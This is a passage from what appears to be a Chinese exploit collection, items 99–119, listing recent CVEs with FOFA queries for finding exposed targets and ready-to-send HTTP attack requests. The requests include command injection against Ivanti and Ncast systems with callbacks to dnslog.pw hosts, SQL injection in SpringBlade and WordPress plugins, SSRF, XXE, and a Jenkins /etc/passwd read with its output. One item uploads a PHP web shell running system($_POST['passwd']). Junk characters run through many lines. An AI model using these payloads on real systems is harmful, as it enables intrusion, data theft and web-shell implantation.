Content-Length: 121# c ~4 V1 ^& t7 v# Q1 A
Accept: */*
& R6 X/ o5 F1 ^1 c; mAccept-Encoding: gzip, deflate5 c" K5 d7 f3 r. j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 L9 g, h! r+ F9 QContent-Type: application/x-www-form-urlencoded; charset=UTF-8
3 M- h5 e( M9 S k, ]6 WX-Requested-With: XMLHttpRequest; J# b* f' R$ l: z1 T; v* Y; }
9 i- T4 @; t6 e- k: P
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B/ R. l& j" R2 ?7 A' ?7 W4 a
; q5 h7 ]/ s' x% Y* K% @
, f' B1 V! O) R7 g4 `& R7 |. h99. Ncast盈可视高清智能录播系统busiFacade RCE; f5 i1 `8 U7 C* c6 u/ Y' m1 b6 z
CVE-2024-0305
% d/ j$ ?+ ~1 z' @& M6 V6 U! aFOFA:app="Ncast-产品" && title=="高清智能录播系统"" C3 @0 {( X2 B) F
POST /classes/common/busiFacade.php HTTP/1.1) V2 |1 \7 }' K' C6 h5 D% s
Host: 192.168.40.130:80807 a; y6 [% H0 K1 S+ [# d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; u$ w3 B8 Y3 A+ Y# H4 x) N, iConnection: close) L6 k9 k: r9 M
Content-Length: 1542 @1 n% N/ b4 @8 L5 ^+ ^
Accept: */*
: o! h8 L) ^4 K8 y+ cAccept-Encoding: gzip, deflate5 n* @$ y% v z# S3 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% x' U, m5 E% u) {: a: k% q
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
9 W3 o% M* _7 Z; LX-Requested-With: XMLHttpRequest
2 a, o7 c5 @2 Y: M& b0 F0 \ j% ?: i( a& ]3 P
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
' j/ o# u; F& B! K- n5 h+ }; @3 O2 S j
- z0 w; {4 L, m" E& {100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传* L0 n: K- q! O1 [; o/ c! R3 f! A
CVE-2024-0352% }& p9 G" {9 U6 s5 w
FOFA:icon_hash="874152924"3 K9 U) j6 u* @% N
POST /api/file/formimage HTTP/1.1
; m/ I. @# R2 iHost: 192.168.40.130
8 z1 |9 s+ B" L zUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, _2 v. j; V8 T) mConnection: close( p8 J, Z9 W) p# o" m" }
Content-Length: 2010 L. W. l, q/ }4 E6 a4 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei) q- p: W( E5 [* v6 g7 K
Accept-Encoding: gzip4 ^) X: y f" s8 w- c
8 b* U; q& W! L$ a4 O: g/ j0 P------WebKitFormBoundarygcflwtei
2 y; ^" _. @9 @* s- CContent-Disposition: form-data; name="file";filename="IE4MGP.php"( C( G/ {6 v* z( ^
Content-Type: application/x-php" \% J0 F3 l" I, x
, n$ F8 J& j- E: z. D" o8 d2ayyhRXiAsKXL8olvF5s4qqyI2O: ~8 Z G% [# F" G2 P1 l$ J
------WebKitFormBoundarygcflwtei--$ ]0 j, [9 \; N$ S( @' R
5 j9 u- I2 b! b4 z8 d+ x8 ]" D+ b
* t6 V! v! D7 `: c# v7 H101. ivanti policy secure-22.6命令注入+ k" {# S0 A6 {- o5 \
CVE-2024-21887
' @% \; J# n. W; A8 I t8 oFOFA:body="welcome.cgi?p=logo"' d" B/ V, `1 R; s( V5 t
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.15 W$ N& j1 t$ [% |
Host: x.x.x.xx.x.x.x' z/ [7 V4 h0 m( E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% X P8 r3 f" V7 W) A
Connection: close
6 a7 _& e G5 f8 d' [& _/ ZAccept-Encoding: gzip
* D! O2 [0 z8 ^# B2 E$ ?1 ?2 E2 L
7 p9 I- X, y: J$ p y! I* T z0 |0 b1 ^. j4 \
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
) P* [, v+ E9 DCVE-2024-21893# I! ?, U B4 K
FOFA:body="welcome.cgi?p=logo"
3 n) g% n* J$ X7 [8 IPOST /dana-ws/saml20.ws HTTP/1.1
5 p/ `8 G5 ~6 {8 OHost: x.x.x.x: P, ` b" e: J* @7 _3 r" I j* h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 @4 W; [7 W4 Y" kConnection: close. g% `) a5 \, h) C* l
Content-Length: 7921 g; s: A' V) G
Accept-Encoding: gzip* ^% Y+ I+ f& e1 @3 @$ W" l2 f
6 s2 a s5 R' v9 \+ b3 n<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>+ g- E! E# {" V3 A# h
. s0 o% ~) l# K2 z' K103. Ivanti Pulse Connect Secure VPN XXE
4 w) s7 j% k3 V9 u8 V" W, fCVE-2024-22024) X5 N! ]$ o8 h- d" O
FOFA:body="welcome.cgi?p=logo"2 p+ M. F* P. _* s% j& c( N; \
POST /dana-na/auth/saml-sso.cgi HTTP/1.11 S2 r& |$ o9 y
Host: 192.168.40.130:111
0 U- k T0 W* V* c, r$ h' W9 S4 d4 oUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36; |' e+ t1 X% C9 ?
Connection: close2 \' D! L$ o" V+ k3 s
Content-Length: 204
! J7 ^2 b& E# z% bContent-Type: application/x-www-form-urlencoded
" o; Y% E5 w# \- |6 Q. PAccept-Encoding: gzip: I0 Z. F% O1 ?6 g$ r1 ?" D) |5 h0 x
/ s$ K0 v/ Z D& f& o2 ^SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
7 S/ k _! G5 E; \7 Y8 [$ K: _; u8 @, |9 |$ Z- F) t
) c+ U& Y ]$ O+ s其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
]/ I* P# N) ]) g7 v<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
: I d7 f1 [4 k# v5 R
; |- U$ [5 T- R
( c4 l6 |( i! `: a104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# m O* l) G1 A' Z- T
CVE-2024-0569
0 k3 X4 i2 F& w- @8 d' rFOFA:title="TOTOLINK"
5 j Y- Q' M Z- }9 i5 Q0 c# BPOST /cgi-bin/cstecgi.cgi HTTP/1.1
1 f% z0 G: V ?3 T; R9 ~3 aHost:192.168.0.1
. h2 c h4 b4 {' f' _Content-Length:41
* H, P. Z7 W/ L/ M. w) C7 T- vAccept:application/json,text/javascript,*/*;q=0.013 |6 g& v: [, q$ G8 w7 q
X-Requested-with: XMLHttpRequest
& X, `1 ~5 u& d5 L: t! FUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36) Z# }) H1 i0 l
Content-Type: application/x-www-form-urlencoded:charset=UTF-83 }# }5 ]4 i% t$ h5 d4 m7 a2 i# B
Origin: http://192.168.0.11 e# Q2 W1 I' T; q* D% o
Referer: http://192.168.0.1/advance/index.html?time=16711523805646 S# k! D% y+ z; e) b2 |
Accept-Encoding:gzip,deflate6 q% c# j1 V5 M) ^
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 h$ b3 c+ ^, DConnection:close
$ n* k! G5 A' c; L# h" }! `' v# b
' l+ ~5 L' a: J: `! Y1 j9 J{
* J* Q$ b, V8 Q9 v2 q( R, ]9 |* S"topicurl":"getSysStatusCfg",
: j' }+ G& M3 N, p# y; b. o"token":""3 Z$ M$ D. u8 u, G
}
! o+ M% U# i& U* C ?# n# K6 U6 e5 Z
( w: \# q6 l M& j8 C, L105. SpringBlade v3.2.0 export-user SQL 注入5 M. v. @/ o {/ x3 }" a6 b
FOFA:body="https://bladex.vip"
7 P5 R' U' I2 F$ ]6 u. u/ c! D2 Yhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=15 [0 ~: h9 C! b/ `( t% l
' l: P& ~8 B9 B106. SpringBlade dict-biz/list SQL 注入
1 _3 P/ ^5 P) D5 R) x% QFOFA:body="Saber 将不能正常工作"
! F. Q9 q7 l: b2 ` XGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. ^ e8 _! z2 I8 h5 ]
Host: your-ip$ [& J0 Q$ v3 \4 ^$ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 ^0 A1 O! Z# J( M0 O" |Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A9 v* Y' R" C. i" K0 J
Accept-Encoding: gzip, deflate
0 a0 t" s9 U Y/ H+ eAccept-Language: zh-CN,zh;q=0.9
! d. d. r6 i; J4 t9 ~Connection: close; s( z7 _. ^/ R: E& w I" `
9 O8 t, s" S- r8 x* H6 V
; w1 `* ~% h, v8 u: `: p6 [- n107. SpringBlade tenant/list SQL 注入
: H0 R" m @# T4 TFOFA:body="https://bladex.vip"+ N' |: G& a7 s% N1 }! d
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 X+ F5 F* k0 C) m. i0 S/ rHost: your-ip
1 R4 ]- P8 o# I, ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 m# H- A0 e" U4 j _Blade-Auth:替换为自己的
* i7 t( _4 l* C7 fConnection: close' G6 v: ]& W, i/ @
5 g6 i% c9 O! V% Z8 p: A' G R9 O! T. O
108. D-Tale 3.9.0 SSRF
6 O% K* {- x- \& ^$ I& @7 U' J: `CVE-2024-21642. |6 j( d/ P" W8 A# V
FOFA:"dtale/static/images/favicon.png"
# T4 _2 _! c* e m' eGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, v7 c2 u2 |# u& I7 }% s
Host: your-ip4 {6 D) K3 o5 C
Accept: application/json, text/plain, */*
, a- U$ J3 F# O; c8 B- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 d i& Y( d3 J. }" s) Y1 |
Accept-Encoding: gzip, deflate
4 v' W+ F; S. k# l& U5 `* LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8% S4 ]' `1 s; Y% b9 q& G( ]4 c
Connection: close
. E$ L' Y- r; E9 k
8 h/ a$ U5 W- t$ h% \8 a f9 ?7 I) }& @3 r, N
109. Jenkins CLI 任意文件读取0 i' e) c L c
CVE-2024-23897
5 E4 w4 C9 F6 U$ o# ]FOFA:header="X-Jenkins"
( n5 d3 o, i6 D" b) g$ Z8 UPOST /cli?remoting=false HTTP/1.1& t( o$ }5 @8 D' H$ T3 k
Host:2 o& W1 K2 r* R: s; X6 G+ u% L2 H
Content-type: application/octet-stream7 Z4 d& T) @7 \
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ M# n3 \5 J( K$ X6 H/ [Side: upload
" ?3 U0 t6 f+ }- a1 Z; BConnection: keep-alive
2 s P# V `5 s9 ]( \Content-Length: 163
( F4 ^6 Y& j! J4 U# g
: i3 E! n% W& z1 F+ zb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'' x+ S4 g& }' Y+ ^1 ]0 \
8 t7 W4 O+ a( {, u- w$ J% m( _: @# d3 Y
POST /cli?remoting=false HTTP/1.1
1 q" ^/ C- ~& b: k/ |1 F+ bHost:5 i! a m* z |9 h! J O' n( n+ A
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" u' P% b' R3 y0 ?8 v) G; ~download: r" f2 Z& \ D- c8 {
Content-Type: application/x-www-form-urlencoded! G& i5 p) g+ }6 R- @3 z
Content-Length: 0
0 m- U) ?% S: r0 R: d: K- z( e; E6 |% t
) m) i5 t/ U' l5 I5 m/ K3 OERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin6 A' o2 m$ S u! w/ ?
java -jar jenkins-cli.jar help7 e, E. G+ N2 h' p) F3 x. Q
[COMMAND]2 Y8 o( O8 ~* u/ ~9 u N
Lists all the available commands or a detailed description of single command.
; P7 v1 p5 i( D9 _, P# D COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)( B' A, o% C; ?
/ t# O9 p- ]0 }1 i) q/ G* }
8 j4 w! G" N6 L* {9 [5 t t110. Goanywhere MFT 未授权创建管理员
, G# V% C" _# z/ d# z$ JCVE-2024-0204
- J% c9 G8 p5 K: g0 qFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
- X: v h6 O' oGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
8 z* ?& @- E' ^% m' NHost: 192.168.40.130:8000: H8 }% \! V3 n1 m, Q- v: b" U
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
/ I+ L# H& ~, y+ xConnection: close
( ~0 i2 l6 d% ^) g7 j3 W* TAccept: */*" P: x- s2 g2 Y* n
Accept-Language: en0 ^; R, q G1 K# ?" a
Accept-Encoding: gzip" [- J+ R- p5 K5 \+ D1 G
. o: E2 w! q8 T5 Y; u6 G; h5 @. Z% {" u; T3 k' Y9 n6 a
111. WordPress Plugin HTML5 Video Player SQL注入
/ O$ G8 [2 Y- B7 Y d$ lCVE-2024-10612 G# h* G. L& f5 j Y& t+ n
FOFA:"wordpress" && body="html5-video-player"
& n! p; O- _5 P# ZGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ A6 L( ~2 e# h9 h
Host: 192.168.40.130:1121 h- V8 \0 r$ d. }; v6 @: p. k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ c+ f; E; i1 m) B; |1 M( R! ?/ FConnection: close2 R5 W2 X) B2 V3 v& y v1 Z# t
Accept: */*
1 F' Q. d$ O D L# a/ G/ E+ lAccept-Language: en
# A J7 U, e4 d+ cAccept-Encoding: gzip
; y F( U: o1 f+ B2 O9 h3 B, R* V1 {0 R
* Z. @* a* p# G8 G: |6 k
112. WordPress Plugin NotificationX SQL 注入4 X! g9 X! N' A& P) V( r6 {# c" w, e
CVE-2024-16987 ^* s, ^5 A( |+ t
FOFA:body="/wp-content/plugins/notificationx"
) D: [' V4 E) pPOST /wp-json/notificationx/v1/analytics HTTP/1.1
" C5 ~+ f; b$ B, T3 qHost: {{Hostname}}( f, Z3 B" w: h' B+ ~
Content-Type: application/json
+ h, _# n& z2 O0 H! @0 Y
( X! B( V; M# ]0 i{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
# o$ y o5 I% L- X: T9 X& z5 o' A0 ^) W: C: @2 D* n" C
1 V/ _. D' d5 E4 J/ U113. WordPress Automatic 插件任意文件下载和SSRF
; j. o3 Z0 _$ B# d" ]; u8 lCVE-2024-27954) F4 X0 a- d, [& u% b
FOFA:"/wp-content/plugins/wp-automatic"
2 @* q Q! l. _. jGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.16 W4 _, @" Q; B. @; M
Host: x.x.x.x3 h- j( B+ P' R5 `* X3 ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36# F6 x! `; r) P$ a
Connection: close" E0 `" {$ V# h. e* L# E9 T8 X5 m
Accept: */*2 h3 c/ ^6 l: ]2 ~ r0 g
Accept-Language: en1 Q3 X; E' E2 E
Accept-Encoding: gzip1 D6 Q" M. A- R
, k& k+ R7 [& ^9 l1 o
/ O3 m3 e5 D* D2 K: E
114. WordPress MasterStudy LMS插件 SQL注入8 [3 Y9 W4 W( }" i1 Y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# e) b7 ~# [$ }/ c' |) s( a+ G
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
" w7 Y2 s6 P# X5 h$ R4 }! e& BHost: your-ip, \9 y; J3 P2 J P+ c: o
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 A0 n J2 U& _ ^" i% b6 L
Accept-Charset: utf-8( N b6 F" B; u$ T' t* w9 h) k$ M
Accept-Encoding: gzip, deflate
- e+ \8 j2 R& t. k4 X% x6 ]# V9 j! G- UConnection: close7 _, k- p( B0 q1 _1 L+ c' P
( p2 c) |" y/ H& N
, z" ]0 h0 @' D' W# K9 e115. WordPress Bricks Builder <= 1.9.6 RCE: D6 o4 d" j: @. Y+ ?' W( ^
CVE-2024-256006 R/ b% p3 v6 q: w) _
FOFA: body="/wp-content/themes/bricks/"0 }. c1 q6 Z) J8 d5 B7 G1 j5 Q
第一步,获取网站的nonce值$ }4 f& s" L {- q p; P3 U
GET / HTTP/1.1 @9 e4 q8 }# N9 o9 n5 `+ d! L
Host: x.x.x.x
2 Y) a6 x% ?+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- A. x9 s$ ]9 Y! @3 S% P$ y
Connection: close: s6 N' A/ Q, W9 k- c% L( c. t
Accept-Encoding: gzip
, e: m7 o2 g" \ Q# c2 J- X
# h% Y: H, s+ o- s* j* w( L& D3 Q( N" V/ D( W. w7 v' h
第二步替换nonce值,执行命令/ M" s# {0 c' a8 G+ Q" w
POST /wp-json/bricks/v1/render_element HTTP/1.1
0 W+ Q1 o1 r L, a* L3 `Host: x.x.x.x5 e) x" J% ]: g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ g" I: W$ p) X; W; n) h( \( n
Connection: close. E- E8 h- y; @
Content-Length: 356$ O0 t g! w p. T" D
Content-Type: application/json
0 m# ]$ E8 S4 D& bAccept-Encoding: gzip
/ i' s; i2 s. Y5 X" p5 l' S+ V9 b$ M0 e7 n, o% g
{
1 v( P% x4 T5 _+ _# N, P8 d"postId": "1",
9 D+ d( [5 w5 ~' V" E" x4 ~) C/ G8 e "nonce": "第一步获得的值",
- Y: q$ D* W% z( j0 @ "element": {- J* e8 {% P7 _6 E) b/ ~- w+ l+ V
"name": "container",) K( ` ?( J$ q! b) d* }
"settings": {
' q( `1 ]7 q& l% c" f1 C+ D "hasLoop": "true",% Y7 P x) i. F
"query": {
( j$ x: v0 f5 [& `9 ^& f# i "useQueryEditor": true," Q# W) ]7 D T2 S- L9 d
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",; k. f( m8 F/ [" u# `- E. a: w
"objectType": "post"
1 l5 H$ w1 u$ C& k' I }7 b/ y6 B( X) C* k
}
: _( W. F) f+ l6 A7 U' N }! l6 U1 J9 p( u: ]) z; m9 }
}9 ^! [1 C0 }4 q6 i7 N6 {4 c
* o, V3 a' F" ^% u8 E- x4 y/ {$ V# k: ?0 V
116. wordpress js-support-ticket文件上传7 V i5 W! i3 v0 e5 [3 q
FOFA:body="wp-content/plugins/js-support-ticket"
3 s% G0 o* |3 I7 XPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
: S* |% Y# d( E' |( N9 RHost:
5 b* J! q6 ^2 Y7 S; C3 sContent-Type: multipart/form-data; boundary=--------767099171. i6 K2 `+ N' k5 s M
User-Agent: Mozilla/5.0' q l6 h9 _+ Q( k7 d( [
) Q5 {: y! l- P0 ?$ I$ J* X( q----------767099171
! q! k7 h9 F7 Z- ]Content-Disposition: form-data; name="action"6 X- Y. t$ W) H
configuration_saveconfiguration" U; N: A) J& c' R; W* X# E# d
----------767099171
2 i9 m! e: Z3 W# m3 u: t' LContent-Disposition: form-data; name="form_request"3 w+ x" N0 R" v' U
jssupportticket6 T/ n% |' _9 F* Y3 f# \. c6 T
----------767099171
0 j1 W$ N( A+ u; x4 r4 PContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
, k* w% ?: c& f: P- p; c( hContent-Type: image/png7 X J/ e5 x8 X4 _; E7 X
----------767099171--
9 N* z6 ]" o/ u+ ?9 e: r
/ b2 r: r$ r8 F p8 Z6 t- o8 n) ~# t. H; `$ B8 B( T% E! B' P! J
117. WordPress LayerSlider插件SQL注入! {" d9 p# @0 ] T# h8 \" \
version:7.9.11 – 7.10.0' _! C4 d4 C5 v
FOFA:body="/wp-content/plugins/LayerSlider/"
( }0 e& H$ ]2 GGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.13 W) W4 H1 f. Z0 V
Host: your-ip
, y* y1 x8 [5 Z9 f9 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; Z) e; e5 a, Q" {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' w. s! b) p, y% {) }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, s9 |( ]$ [& G
Accept-Encoding: gzip, deflate, br
r- d5 p8 E/ U7 I5 |! \% d% B+ [2 ^Connection: close- y2 }3 {1 q! p: d
Upgrade-Insecure-Requests: 1, n' L K% R4 f, ~9 F4 N8 n
# V2 Y0 l8 n6 B7 m- o2 A
) ]: l3 t* O" T h+ U
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% f* q& c' y9 g: PCVE-2024-0939' M4 l- t6 U, m5 [/ ?0 j$ }
FOFA:title="Smart管理平台"
j( q. y v$ ]& v5 P' @POST /Tool/uploadfile.php? HTTP/1.1
1 Q# o, x7 M$ ]* FHost: 192.168.40.130:8443% P( A: ? n* O) m
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
c+ q( e, B4 K A8 V2 Z E( XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
6 E# y; C, ?* |6 A6 H H {- N# l: [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; u/ n( d5 A' V' M* Z( O- u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; M+ w8 O) i" c
Accept-Encoding: gzip, deflate
) U# b9 l* i lContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
8 v; d, D. V# @! A, eContent-Length: 405
7 Z0 `7 J) p) L% w0 COrigin: https://192.168.40.130:84436 q4 e" e: E/ r$ e$ D# {
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
3 V1 {& g5 ~1 J1 YUpgrade-Insecure-Requests: 10 ], x; p+ s0 V, c
Sec-Fetch-Dest: document6 e o* y) z; Q8 L7 K7 m
Sec-Fetch-Mode: navigate
7 x/ k1 j' x. G/ f1 w2 m! ZSec-Fetch-Site: same-origin) ]' z4 G9 V+ g; D
Sec-Fetch-User: ?1
! Z( E4 n! a. R8 s5 nTe: trailers+ ]. T. l4 s, G7 r# y P6 b
Connection: close
2 Q2 d+ k2 O0 w8 A9 C
1 {4 N" E; u; v2 ^! z1 C9 ?-----------------------------139797012227476466340371828870 K8 V; V) w* L+ q
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
2 W8 P4 N' C. B9 d: PContent-Type: application/octet-stream
$ l3 ?( ]- s p8 C' h2 Y) `$ W6 o6 f W7 X3 D/ W# e" i% j3 f& {; w; ^
<?php
: ^$ H9 a" V# v* }system($_POST["passwd"]);
5 y7 ]6 s" l2 O- f6 z( J t?>
$ m- q7 i/ Z5 X$ e, H7 P-----------------------------13979701222747646634037182887
4 k) j- N# C) `5 o; FContent-Disposition: form-data; name="txt_path"# _$ I) U, z! M
* T5 C; K# f' d3 d+ I/home/src.php
% s7 q* _" Y# ~( p E9 [-----------------------------13979701222747646634037182887--
( M5 X8 ?" z2 e9 j' L
! n/ G, f2 c; M9 c- O) ?( |% M4 \. D7 s; R& F$ L2 u+ r
访问/home/src.php7 I. F% ?6 j) `7 y' a* M; k; l
; w% a1 F5 y) L! R. w
119. 北京百绰智能S20后台sysmanageajax.php sql注入1 a) Q$ x3 R/ Y- M+ {2 x
CVE-2024-1254
9 [' {6 l1 Y6 B$ k% U' t6 mFOFA:title="Smart管理平台"0 p! @. G5 x L
先登录进入系统,默认账号密码为admin/admin
0 R$ s2 [; J; H( Q# k+ T, \9 _/ P, IPOST /sysmanage/sysmanageajax.php HTTP/1.11! x: W- a* a1 e
Host: x.x.x.x. v2 ^% P& M/ m1 n& U, Y% O
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
3 A) w+ @* \1 @& c' X. cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; v% H- i6 \/ t- H
Accept: */*) v/ C* G5 z! W4 {7 c! Z6 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 V/ ^" h# V* }- O$ WAccept-Encoding: gzip, deflate
# W2 ?2 A# z/ O$ g+ z; BContent-Type: application/x-www-form-urlencoded;/ M& n/ t6 r1 ~: X6 E. q
Content-Length: 109
4 R+ ?% x) Q( yOrigin: https://58.18.133.60:8443 R- r8 o$ G7 m! e0 n7 e
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
6 e, }' }. g. T' V8 h- E, iSec-Fetch-Dest: empty: o6 \: g3 W! l5 h5 z
Sec-Fetch-Mode: cors
3 Q3 M9 [7 v* D$ O& z! [3 lSec-Fetch-Site: same-origin
3 @8 h. ^4 B0 `, Q* `! ?X-Forwarded-For: 1.1.1.1+ m8 g) J4 h) c$ I$ S
X-Originating-Ip: 1.1.1.13 K0 C7 q( w8 V( I
X-Remote-Ip: 1.1.1.1& `4 W, h9 ]( I- |4 }" M
